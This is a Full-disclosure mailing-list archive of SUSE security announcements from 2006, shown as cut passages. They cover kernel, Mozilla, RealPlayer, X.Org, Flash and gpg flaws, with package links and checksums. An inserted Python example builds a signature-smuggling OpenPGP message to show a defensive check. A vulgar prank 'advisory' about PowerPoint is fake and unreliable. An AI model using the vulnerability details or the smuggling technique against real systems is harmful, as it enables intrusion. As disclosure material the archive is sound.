 to refer back to itself when the full message is reassembled,
 leading to infinite recursion in the sctp_skb_pull function.

   - CVE-2006-2272: Linux SCTP allowed remote attackers to cause a
 denial of service (kernel panic) via incoming IP fragmented (1)
 COOKIE_ECHO and (2) HEARTBEAT SCTP control chunks.

   - CVE-2006-2271: The ECNE chunk handling in Linux SCTP allowed
 remote attackers to cause a denial of service (kernel panic) via
 an unexpected chunk when the session is in CLOSED state.

   - CVE-2006-1864: Due to incorrect argument checking it was possible
 to break out of chroots on smbfs file systems.

   - CVE-2006-1863: Due to incorrect argument checking it was possible
 to break out of chroots on cifs file systems.

   - CVE-2006-1527: NETFILTER SCTP conntrack: Fixed an infinite loop
 in sctp handling, which could be caused by a remote attacker.

   - CVE-2006-1525: IPV4: Fixed a machine crash in ip_route_input that
 could be triggered via the route command from local attackers.

   - CVE-2006-1524: shmat: stop mprotect from giving write permission
 to a read-only shared memory attachment.

   - CVE-2006-1523: __group_complete_signal: Removed a bogus BUG_ON which
 could lead to unwanted process crashes.

   - CVE-2006-1342: A minor information leak in SO_ORIGINAL_DST was fixed.

   - CVE-2006-1242: Fix IPv4 IPID generation to avoid possible idle scans
 against the machine.

   - CVE-2006-1056: i386/x86-64: Fix AMD x87 information leak between
 processes.

   - CVE-2006-1055: sysfs: Zero terminate sysfs write buffers.

   - CVE-2006-0744: When the user could have changed %RIP always force IRET.

   - CVE-2006-0742: IA64 only: Don't declare die_if_kernel as noreturn,
 otherwise local attackers can crash the machine.

   - CVE-2006-0741: x86_64 only: Always check that RIPs are canonical
 during signal handling, otherwise local attackers could crash
 the machine.

   - CVE-2006-0557: Add an upper boundary to mempolicy node arguments
 to avoid potentially local crashes.

   - CVE-2006-0555: A normal user was able to panic the NFS 

[Full-disclosure] SUSE Security Announcement: Mozilla Firefox, Mozilla Suite various problems (SUSE-SA:2006:021)

2006-04-20 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:MozillaFirefox,mozilla
Announcement ID:SUSE-SA:2006:021
Date:   Thu, 20 Apr 2006 09:00:00 +
Affected Products:  Novell Linux Desktop 9
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE LINUX 9.1
SuSE Linux Desktop 1.0
SuSE Linux Enterprise Server 8
SUSE SLES 9
UnitedLinux 1.0
Vulnerability Type: remote code execution
Severity (1-10):8
SUSE Default Package:   yes
Cross-References:   CVE-2006-0749, CVE-2006-0884, CVE-2006-1727
CVE-2006-1728, CVE-2006-1729, CVE-2006-1730
CVE-2006-1731, CVE-2006-1732, CVE-2006-1733
CVE-2006-1734, CVE-2006-1735, CVE-2006-1736
CVE-2006-1737, CVE-2006-1738, CVE-2006-1739
CVE-2006-1740, CVE-2006-1741, CVE-2006-1742
CVE-2006-1790
MFSA 2006-09,  MFSA 2006-10,  MFSA 2006-11
MFSA 2006-12,  MFSA 2006-13,  MFSA 2006-14
MFSA 2006-15,  MFSA 2006-16,  MFSA 2006-17
MFSA 2006-18,  MFSA 2006-19,  MFSA 2006-21
MFSA 2006-22,  MFSA 2006-23,  MFSA 2006-24
MFSA 2006-25

Content of This Advisory:
1) Security Vulnerability Resolved:
 various security problems in Mozilla based browsers
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   A number of security issues have been fixed in the Mozilla browser
   suite and the Mozilla Firefox browser.
   These problems could be used by remote attackers to gain privileges,
   gain access to confidential information or to cause denial of service
   attacks.

   The updates of the Firefox packages bring it up to Firefox 1.0.8 fix level.
   The updates of the Mozilla suite bring it up to Mozilla 1.7.13 fix level.

   Mozilla Thunderbird is also affected by some of the listed issues, but
   updates will be provided later due to unrelated problems. Most of them
   can be worked around by turning JavaScript in mails off (which is the
   default for Thunderbird).

   Full details of all issues can be found on:
http://www.mozilla.org/security/announce/

   List of issues that were fixed:

   MFSA 2006-25/CVE-2006-1727:
Privilege escalation through Print Preview
   MFSA 2006-24/CVE-2006-1728:
Privilege escalation using crypto.generateCRMFRequest
   MFSA 2006-23/CVE-2006-1729:
File stealing by changing input type
   MFSA 2006-22/CVE-2006-1730:
CSS Letter-Spacing Heap Overflow Vulnerability
   MFSA 2006-21/CVE-2006-0884:
Javascript execution when forwarding or replying
   MFSA 2006-19/CVE-2006-1731
Cross-site scripting using .valueOf.call()
   MFSA 2006-18/CVE-2006-0749
Mozilla Firefox Tag Order Vulnerability
   MFSA 2006-17/CVE-2006-1732
Cross-site scripting through window.controllers
   MFSA 2006-16/CVE-2006-1733
Accessing XBL compilation scope via valueOf.call()
   MFSA 2006-15/CVE-2006-1734
Privilege escalation using a JavaScript function's cloned parent
   MFSA 2006-14/CVE-2006-1735
Privilege escalation via XBL.method.eval
   MFSA 2006-13/CVE-2006-1736
Downloading executables with Save Image As...
   MFSA 2006-12/CVE-2006-1740
Secure-site spoof (requires security warning dialog)
   MFSA 2006-11/CVE-2006-1739,CVE-2006-1737,CVE-2006-1738,CVE-2006-1790
Crashes with evidence of memory corruption (rv:1.8)
   MFSA 2006-10/CVE-2006-1742
JavaScript garbage-collection hazard audit
   MFSA 2006-09/CVE-2006-1741
Cross-site JavaScript injection using event handlers

   We wish to thank the Mozilla Developers and the various bug reporters
   for reporting and fixing those issues.

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method 

[Full-disclosure] SUSE Security Announcement: RealPlayer security problems (SUSE-SA:2006:018)

2006-03-23 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:RealPlayer
Announcement ID:SUSE-SA:2006:018
Date:   Thu, 23 Mar 2006 12:00:00 +
Affected Products:  Novell Linux Desktop 9
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
Vulnerability Type: remote code execution
Severity (1-10):8
SUSE Default Package:   yes
Cross-References:   CVE-2005-2922, CVE-2006-0323

Content of This Advisory:
1) Security Vulnerability Resolved:
 realplayer security problems
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   This update fixes the following security problems in Realplayer:

   - Specially crafted SWF files could cause a buffer overflow and
 crash RealPlayer (CVE-2006-0323).

   - Specially crafted web sites could cause a heap overflow and lead to
 executing arbitrary code (CVE-2005-2922). This was already fixed
 with the previously released 1.0.6 version, but not announced at
 Real's request.

   The advisory for these problems is on this page at Real:
   http://service.real.com/realplayer/security/03162006_player/en/

   SUSE Linux 9.2 up to 10.0 and Novell Linux Desktop 9 are affected by
   this problem and receive fixed packages.

   If you are still using RealPlayer on SUSE Linux 9.1 or SUSE Linux
   Desktop 1, we again wish to remind you that the RealPlayer on these
   products cannot be updated and recommend deinstalling it.

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm
  eaf09598db97183bdb25478dc5266edf

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm
  427de6f3af871dca3d9c6c4f42d14793

   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm
  e84dd17634bcb046ade69fcdc8d67468

   Sources:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/RealPlayer-10.0.7-0.1.nosrc.rpm
  d686f982312d06ff76ad786c29c94f5a

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/RealPlayer-10.0.7-0.1.src.rpm
  5355bf3f17801d07f9a004711622dc8e

   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/RealPlayer-10.0.7-0.1.src.rpm
  0a7e783c563c24107b04b7f7f4e0b697

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web:

   http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/3ad7b20395a03f666b8f4ffe14e9276d.html

__

5) Pending Vulnerabilities, Solutions, and Work-Arounds:

   See SUSE Security Summary Report.
__

6) Authenticity Verification and Additional Information

  - Announcement authenticity verification:

SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.

To verify the signature of the announcement, save it as text into a file
and run the command

  gpg --verify file

replacing file with the name of the file where you saved the
announcement. The output for a valid signature looks like:

  gpg: Signature made DATE using RSA key ID 

[Full-disclosure] SUSE Security Announcement: xorg-x11-server local privilege escalation (SUSE-SA:2006:016)

2006-03-21 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:xorg-x11-server
Announcement ID:SUSE-SA:2006:016
Date:   Tue, 21 Mar 2006 11:00:00 +
Affected Products:  SUSE LINUX 10.0

Vulnerability Type: local privilege escalation
Severity (1-10):7
SUSE Default Package:   yes
Cross-References:   CVE-2006-0745

Content of This Advisory:
1) Security Vulnerability Resolved:
 local privilege escalation in the X.Org Xserver
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   A programming flaw in the X.Org X Server allows local attackers to
   gain root access when the server is setuid root, as is the default
   in SUSE Linux 10.0.  This flaw was spotted by the Coverity project.

   Only SUSE Linux 10.0 is affected, older products do not include the
   problematic piece of code.

   This problem is tracked by the Mitre CVE ID CVE-2006-0745.

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/xorg-x11-server-6.8.2-100.4.i586.rpm
  f9187a4620e159d0989986883bf634ff

   Power PC Platform:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/xorg-x11-server-6.8.2-100.4.ppc.rpm
  7f6f668edc4addf3650f9a7010e67964

   x86-64 Platform:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/xorg-x11-server-6.8.2-100.4.x86_64.rpm
  2fdb791cc8a0054d1c76c61d136c88b7

__

5) Pending Vulnerabilities, Solutions, and Work-Arounds:

   See SUSE Security Summary Report.
__

6) Authenticity Verification and Additional Information

  - Announcement authenticity verification:

SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.

To verify the signature of the announcement, save it as text into a file
and run the command

  gpg --verify file

replacing file with the name of the file where you saved the
announcement. The output for a valid signature looks like:

  gpg: Signature made DATE using RSA key ID 3D25D3D9
  gpg: Good signature from SuSE Security Team [EMAIL PROTECTED]

where DATE is replaced by the date the document was signed.

If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command

  gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc

  - Package authenticity verification:

SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.

There are two verification methods that can be used independently from
each other to prove the authenticity of a downloaded file or RPM package:

1) Using the internal gpg signatures of the rpm package
2) MD5 checksums as provided in this announcement

1) The internal rpm package signatures provide an easy way to verify the
   authenticity of an RPM package. Use the command

rpm -v --checksig file.rpm

   to verify the signature of the package, replacing file.rpm with the
   

[Full-disclosure] SUSE Security Announcement: flash-player buffer overflow (SUSE-SA:2006:015)

2006-03-21 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:flash-player
Announcement ID:SUSE-SA:2006:015
Date:   Tue, 21 Mar 2006 11:00:00 +
Affected Products:  Novell Linux Desktop 9
SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE LINUX 9.1
Vulnerability Type: remote code execution
Severity (1-10):8
SUSE Default Package:   yes
Cross-References:   CVE-2006-0024

Content of This Advisory:
1) Security Vulnerability Resolved:
 remote buffer overflow in flash-player
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   A critical security vulnerability has been identified in the Adobe
   Macromedia Flash Player that allows an attacker who successfully
   exploits it to take control of the application running the Flash
   Player.

   A malicious SWF must be loaded in the Flash Player by the user for
   an attacker to exploit this vulnerability.

   This issue is tracked by the Mitre CVE ID CVE-2006-0024.

2) Solution or Work-Around

   If you do not want to view Flash content, you can deinstall
   the Flash Player by doing:

  rpm -e flash-player

   Otherwise please install the updated packages.

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/flash-player-7.0.63.0-1.1.i586.rpm
  0c45a695373aac68f923b7a5ebcb4241

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/flash-player-7.0.63.0-1.1.i586.rpm
  bd8d78f4d2409521f994ca870698e50e

   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/flash-player-7.0.63.0-1.1.i586.rpm
  929136205231c24e4771ea0bbff9679b

   SUSE LINUX 9.1:
   ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/flash-player-7.0.63.0-1.2.i586.rpm
  dac8004a7507564f4b865bdbac8be214

   Sources:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/flash-player-7.0.63.0-1.1.src.rpm
  16f6c0d77f66993f9ba93bd4fd08fa64

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/flash-player-7.0.63.0-1.1.src.rpm
  f5418883a07b77d0bcf75a36b04da604

   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/flash-player-7.0.63.0-1.1.src.rpm
  2c7f5b5b97080a78c6df5f44b09b8f72

   SUSE LINUX 9.1:
   ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/flash-player-7.0.63.0-1.2.src.rpm
  044f4b8541dafb24643566fa853cbf76

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web:

   http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/d000a328085994512d2a98ef9e006471.html

__

5) Pending Vulnerabilities, Solutions, and Work-Arounds:

   See SUSE Security Summary Report.
__

6) Authenticity Verification and Additional Information

  - Announcement authenticity verification:

SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.

To verify the signature of the announcement, save it as text into a file
and run the command

  gpg --verify file

replacing file with the name of the file where you saved the
announcement. The output for a valid signature looks like:

  

[Full-disclosure] [ADVISORY] + [Thu Mar 16 21:02:56 EST 2006] + Local Privilege Escalation Vulnerability in Microsoft PowerPoint

2006-03-16 Thread Marcus Meissner



[ADVISORY] + [Thu Mar 16 21:02:56 EST 2006] + Local Privilege Escalation 
Vulnerability in Microsoft PowerPoint




++
8===D Background
++
This product had no background information on the product.
++
8===D Description
++
Microsoft PowerPoint incorrectly validates user input, making privilege 
escalation possible.

++
8===D Workaround
++
This advisory had no workarounds on this issue.


++
Contact
++
Marcus Meissner [EMAIL PROTECTED]
1-888-565-9428
BEWARE THE JIZZTAPO!!!

..
_ .' `.
   /\)
  / /
 / /   /\
 \ \  /  \
  _   \ \/ /\ \
 (/\   \  /  \ \
  \ \  /  \   (Y )
   \ \/ /\ \   
\  /  \ \
 \/   / /
 / /
( Y)
 


GSAE CCE CSFA GREM SSP-CNSA GIPS SSCP 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] SUSE Security Announcement: gpg signature checking problems (SUSE-SA:2006:014)

2006-03-10 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:gpg
Announcement ID:SUSE-SA:2006:014
Date:   Fri, 10 Mar 2006 18:00:00 +
Affected Products:  SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE LINUX 9.1
SuSE Linux Desktop 1.0
SuSE Linux Enterprise Server 8
SUSE SLES 9
UnitedLinux 1.0
Vulnerability Type: remote code execution
Severity (1-10):9
SUSE Default Package:   yes
Cross-References:   CVE-2006-0049

Content of This Advisory:
1) Security Vulnerability Resolved:
 gpg signature verification problem
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   The GNU Privacy Guard (GPG) allows crafting a message which checks
   out as correct using --verify, but extracts different, potentially
   malicious content when using -o --batch.

   The reason for this is that a .gpg or .asc file can contain multiple
   plain text and signature streams and the handling of these streams was
   only possible when correctly following the gpg state.

   The gpg --verify option has been changed to be much stricter than
   before and to fail on files with multiple signatures/blocks, mitigating
   the problem of doing the common --verify check followed by -o extraction.

   This problem could be used by an attacker to remotely execute code
   by using handcrafted YaST Online Patch files put onto a compromised
   YOU mirror server and waiting for the user to run YOU.

   This problem is tracked by the Mitre CVE ID CVE-2006-0049.

   This is a different issue than the gpg signature checking problem for
   which we released updates a week ago, tracked by SUSE-SA:2006:013 /
   CVE-2006-0455.

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/gpg-1.4.2-5.4.i586.rpm
  17f4db7313fb81477d491cd1de3b4a7c

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/gpg-1.4.0-4.4.i586.rpm
  781a1f6ee507960c3b7f5ab7b09aae01

   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/gpg-1.2.5-3.6.i586.rpm
  0ac37c5097314b9d65fe3c00552991ba

   SUSE LINUX 9.1:
   ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/gpg-1.2.4-68.13.i586.rpm
  2436ccc119ac1af98928536d2b968a3a

   Power PC Platform:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/ppc/gpg-1.4.2-5.4.ppc.rpm
  7da97d12baf4aa28e307affa9ccaa2ad

   x86-64 Platform:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/gpg-1.4.2-5.4.x86_64.rpm
  490728e89c6564ac1e0b679012a89a42

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/gpg-1.4.0-4.4.x86_64.rpm
  f258e8971ef2eb171907bbc426e15893

   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/gpg-1.2.5-3.6.x86_64.rpm
  3e59895b7bed858997bdbc49aece5644

   SUSE LINUX 9.1:
   ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/gpg-1.2.4-68.13.x86_64.rpm
  6369420f068f5d935bbc01f4798f2f20

   Sources:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/gpg-1.4.2-5.4.src.rpm
  a4ee567384c8744bafc59c19ed89669e

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/gpg-1.4.0-4.4.src.rpm
  2d392b6698c4a9bb5f2b54aa51b53405

   SUSE LINUX 9.2:
   

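The SUSE-SA:2006:014 announcement above describes a .gpg file that carries more than one plaintext/signature stream, so that gpg --verify reports success while gpg -o --batch writes out content the signature never covered. What follows is an added example, not code from SUSE or GnuPG: a minimal OpenPGP packet walker (header rules from RFC 4880 section 4.2) that enumerates the packets of a message and applies the policy the update introduced, rejecting anything that is not exactly one literal data packet covered by exactly one signature. The messages are constructed inline and the signature bodies are placeholders; no cryptography is checked here, the point is the structural check that has to happen before, or together with, extraction.

```python
"""Added example (not SUSE or GnuPG code): OpenPGP packet walker with a
single-signed-block policy. Header rules follow RFC 4880 section 4.2; the
sample messages are constructed here with placeholder signature bodies."""
import struct

# RFC 4880 packet tags used in this example
TAG_SIGNATURE = 2
TAG_ONE_PASS_SIG = 4
TAG_LITERAL = 11


def new_format_packet(tag, body):
    """Encode a packet with a new-format header (RFC 4880 4.2.2), no partial lengths."""
    n = len(body)
    if n < 192:
        length = bytes([n])
    elif n < 8384:
        n2 = n - 192
        length = bytes([(n2 >> 8) + 192, n2 & 0xFF])
    else:
        length = b"\xff" + struct.pack(">I", n)
    return bytes([0xC0 | tag]) + length + body


def old_format_packet(tag, body):
    """Encode a packet with an old-format header (RFC 4880 4.2.1) and a 2-octet length."""
    return bytes([0x80 | (tag << 2) | 1]) + struct.pack(">H", len(body)) + body


def literal_body(data, filename=b"patch.sh"):
    """Literal data packet body: format octet, filename, 4-octet timestamp, data."""
    return b"b" + bytes([len(filename)]) + filename + b"\x00\x00\x00\x00" + data


def parse_packets(buf):
    """Return a list of (tag, body) for every packet in buf; ValueError on bad headers."""
    packets, i = [], 0
    while i < len(buf):
        ctb = buf[i]
        i += 1
        if not ctb & 0x80:
            raise ValueError("bit 7 of the packet tag octet must be set")
        if ctb & 0x40:                      # new-format header
            tag = ctb & 0x3F
            b1 = buf[i]
            i += 1
            if b1 < 192:
                n = b1
            elif b1 < 224:
                n = ((b1 - 192) << 8) + buf[i] + 192
                i += 1
            elif b1 == 255:
                n = struct.unpack(">I", buf[i:i + 4])[0]
                i += 4
            else:
                raise ValueError("partial body lengths are not handled in this example")
        else:                               # old-format header
            tag = (ctb >> 2) & 0x0F
            ltype = ctb & 0x03
            if ltype == 3:
                raise ValueError("indeterminate length is not handled in this example")
            width = (1, 2, 4)[ltype]
            n = int.from_bytes(buf[i:i + width], "big")
            i += width
        body = buf[i:i + n]
        if len(body) != n:
            raise ValueError("truncated packet body")
        packets.append((tag, body))
        i += n
    return packets


def check_single_signed_block(buf):
    """Policy from the advisory: exactly one literal data packet and exactly one
    signature packet, with the signature after the data it covers."""
    tags = [t for t, _ in parse_packets(buf)]
    n_lit, n_sig = tags.count(TAG_LITERAL), tags.count(TAG_SIGNATURE)
    if n_lit != 1:
        return False, f"{n_lit} literal data packets (expected 1)"
    if n_sig != 1:
        return False, f"{n_sig} signature packets (expected 1)"
    if tags.index(TAG_SIGNATURE) < tags.index(TAG_LITERAL):
        return False, "signature precedes the literal data"
    return True, "single signed block"


def literal_payloads(buf):
    """Everything a naive 'extract all literal data' step would write out."""
    out = []
    for tag, body in parse_packets(buf):
        if tag == TAG_LITERAL:
            fn_len = body[1]
            out.append(body[2 + fn_len + 4:])
    return out


# Constructed samples. SIG_PLACEHOLDER stands in for a real signature packet body.
SIG_PLACEHOLDER = b"\x04\x00" + b"\x00" * 14
GOOD = (new_format_packet(TAG_ONE_PASS_SIG, b"\x03\x00")
        + new_format_packet(TAG_LITERAL, literal_body(b"echo signed\n"))
        + new_format_packet(TAG_SIGNATURE, SIG_PLACEHOLDER))
# A second literal packet appended after the signed block; nothing signs it.
SMUGGLED = GOOD + old_format_packet(TAG_LITERAL, literal_body(b"echo unsigned\n", b"extra"))

if __name__ == "__main__":
    for name, msg in (("good", GOOD), ("smuggled", SMUGGLED)):
        ok, why = check_single_signed_block(msg)
        print(f"{name}: {'accept' if ok else 'reject'} ({why}); payloads={literal_payloads(msg)}")
```

Running it accepts the single-block message and rejects the one with the trailing unsigned literal packet, while literal_payloads() shows the two payloads a naive extractor would write out. The practical rule the advisory implies: verify and extract in one gpg invocation and check that invocation's exit status, rather than chaining a --verify run with a separate -o run over the same file.
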
[Full-disclosure] SUSE Security Announcement: gpg, liby2util signature checking problems (SUSE-SA:2006:013)

2006-03-01 Thread Marcus Meissner

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

__

SUSE Security Announcement

Package:gpg,liby2util
Announcement ID:SUSE-SA:2006:013
Date:   Wed, 01 Mar 2006 11:00:00 +
Affected Products:  SUSE LINUX 10.0
SUSE LINUX 9.3
SUSE LINUX 9.2
SUSE LINUX 9.1
SuSE Linux Desktop 1.0
SuSE Linux Enterprise Server 8
SUSE LINUX Enterprise Server 9
UnitedLinux 1.0
Open Enterprise Server 1
Novell Linux Desktop 9
Vulnerability Type: remote code execution
Severity (1-10):9
SUSE Default Package:   yes
Cross-References:   CVE-2006-0455, CVE-2006-0803

Content of This Advisory:
1) Security Vulnerability Resolved:
 gpg signature checking problems
   Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
See SUSE Security Summary Report.
6) Authenticity Verification and Additional Information

__

1) Problem Description and Brief Discussion

   This is a reissue of SUSE-SA:2006:009, after we found out that gpg
   versions < 1.4.x are also affected by the signature checking problem
   of CVE-2006-0455.

   With certain handcraftable signatures GPG was returning a 0 (valid
   signature) when used on command-line with option --verify.

   This could make automated checkers, like for instance the patch file
   verification checker of the YaST Online Update, pass malicious patch
   files as correct and allow remote code execution.

   This is tracked by the Mitre CVE ID CVE-2006-0455.

   Also, the YaST Online Update script signature verification had used a
   feature which was not meant to be used for signature verification,
   making it possible to supply any kind of script which would be
   considered correct. This would also allow code execution.

   This issue is tracked by the Mitre CVE ID CVE-2006-0803.

   Both attacks require an attacker either manipulating a YaST Online
   Update mirror or manipulating the network traffic between the mirror
   and your machine.

2) Solution or Work-Around

   There is no known workaround, please install the update packages.

3) Special Instructions and Notes

   None.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

 rpm -Fhv file.rpm

   to apply the update, replacing file.rpm with the filename of the
   downloaded RPM package.


   x86 Platform:

   SUSE LINUX 10.0:
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/liby2util-2.12.9-0.4.i586.rpm
  91697f9207b20931d669f9f6d085b816
   ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/liby2util-devel-2.12.9-0.4.i586.rpm
  c6815c8ff1cc695f91cf9c1ba6960554

   SUSE LINUX 9.3:
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/liby2util-2.11.7-0.3.i586.rpm
  a321ab146d07c50cc69a91352ac28bf7
   ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/liby2util-devel-2.11.7-0.3.i586.rpm
  1215bcf8f061079dbe05b93b1d611818

   SUSE LINUX 9.2:
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/gpg-1.2.5-3.4.i586.rpm
  3df19ea2069732c17da1b150d76fdba1
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/liby2util-2.10.7-0.3.i586.rpm
  ab21dd4a8f561abba2cd5b25e3076e41
   ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/liby2util-devel-2.10.7-0.3.i586.rpm
  e1b45fbf2b326e7a4d06d1fa23100415

